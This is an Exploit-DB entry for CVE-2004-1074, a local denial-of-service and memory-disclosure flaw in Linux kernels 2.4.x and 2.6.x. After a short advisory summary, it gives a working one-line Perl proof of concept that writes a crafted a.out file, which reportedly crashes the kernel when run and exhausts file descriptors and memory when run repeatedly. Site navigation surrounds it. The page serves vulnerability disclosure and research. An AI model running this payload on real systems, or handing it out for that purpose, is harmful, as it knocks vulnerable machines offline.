Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure

EDB-ID:

24777

CVE:

2004-1074

EDB Verified:

Author:

Florian Heinz

Type:

dos

Exploit:   /  

Platform:

Linux

Date:

2004-11-25

Vulnerable App: 
source: https://www.securityfocus.com/bid/11754/info

The Linux kernel is reported prone to multiple local vulnerabilities:

- A handcrafted 'a.out' file may be used to trigger a local denial-of-service condition. A local attacker may exploit this vulnerability to trigger a system-wide denial of service, potentially resulting in a kernel panic. 

- A memory-disclosure vulnerability reportedly affects only SMP computers with more than 4GB of memory. A local attacker may exploit this vulnerability to access random pages of physical memory.

perl -e'print"\x07\x01".("\x00"x13)."\xc0".("\x00"x16)' > eout 

Executing the resulting 'eout' file reportedly results in a kernel oops. Repeatedly running the resulting file will consume file descriptors and memory.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services